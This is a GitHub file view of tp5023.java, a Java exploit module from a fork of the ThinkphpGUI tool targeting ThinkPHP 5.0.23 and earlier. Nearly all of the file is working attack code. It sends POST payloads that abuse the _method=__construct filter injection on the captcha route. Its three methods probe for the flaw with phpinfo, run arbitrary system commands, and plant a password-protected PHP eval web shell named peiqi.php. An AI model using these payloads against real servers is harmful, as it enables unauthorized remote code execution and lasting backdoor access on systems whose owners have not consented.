forked from Lotus6/ThinkphpGUI
-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathtp5023.java
More file actions
executable file
·81 lines (72 loc) · 3.42 KB
/
tp5023.java
File metadata and controls
executable file
·81 lines (72 loc) · 3.42 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
package exploit;
import com.github.kevinsawicki.http.HttpRequest;
import util.BasePayload;
import util.Result;
import java.util.ArrayList;
//ThinkPHP <= 5.0.23 需要存在xxx的method路由,例如captcha
public class tp5023 implements BasePayload {
@Override
public Result checkVUL(String url) throws Exception {
String CheckStr = "PHP Version";
String payload_url = url + "/?s=captcha&test=-1";
ArrayList<String> payloads = new ArrayList<String>() {{
add("_method=__construct&filter[]=phpinfo&method=get&server[REQUEST_METHOD]=1");
add("_method=__ConStruct&method=get&filter[]=call_user_func&get[0]=phpinfo");
add("_method=__construct&filter[]=phpinfo&method=GET&get[]=1");
}};
for (String payload : payloads) {
try {
HttpRequest req = HttpRequest.post(payload_url).send(payload);
if (req.body().contains(CheckStr)) {
return new Result(true, "ThinkPHP 5.0.23 RCE", payload_url + " Post: " + payload);
}
} catch (Exception e) {
e.printStackTrace();
}
}
return new Result(false, "ThinkPHP 5.0.23 RCE", "");
}
public Result exeVUL(String url, String cmd) throws Exception {
String payload_url = url + "/?s=captcha&test=-1";
ArrayList<String> payloads = new ArrayList<String>() {{
add("_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=" + cmd);
add("s=" + cmd + "&_method=__construct&method=get&filter[]=system");
add("s=" + cmd + "&_method=__construct&method&filter[]=system");
}};
for (String payload : payloads) {
try {
String response = HttpRequest.post(payload_url).send(payload).body();
String res = response.substring(0, response.indexOf("<"));
if (res.equals("")) {
return new Result(true, "", response);
}
return new Result(true, "", res);
} catch (Exception e) {
e.printStackTrace();
}
}
return new Result(false, null, null);
}
@Override
public Result getShell(String url) throws Exception {
String payload_url = url + "/?s=captcha&test=-1";
ArrayList<String> payloads = new ArrayList<String>() {{
add("_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=echo '<?php @eval($_POST['peiqi'])?>' >>peiqi.php");
add("_method=__construct&filter[]=system&method=GET&get[]=echo '<?php @eval($_POST['peiqi'])?>' >>peiqi.php");
add("_method=__construct&filter[]=assert&method=GET&get[]=file_put_contents('./peiqi.php','<?php%20@eval($_POST[%27peiqi%27])?>');");
add("_method=__construct&filter[]=assert&method=GET&get[]=copy('<?php%20@eval($_POST[%27peiqi%27])?>', './peiqi.php');");
}};
for (int i = 0; i < payloads.size(); i++) {
try {
String res = HttpRequest.post(payload_url).send(payloads.get(i)).body();
int code = HttpRequest.get(url + "/peiqi.php").code();
if (code == 200) {
return new Result(true, null, url + "/peiqi.php Pass:peiqi");
}
} catch (Exception e) {
e.printStackTrace();
}
}
return new Result(false, null, null);
}
}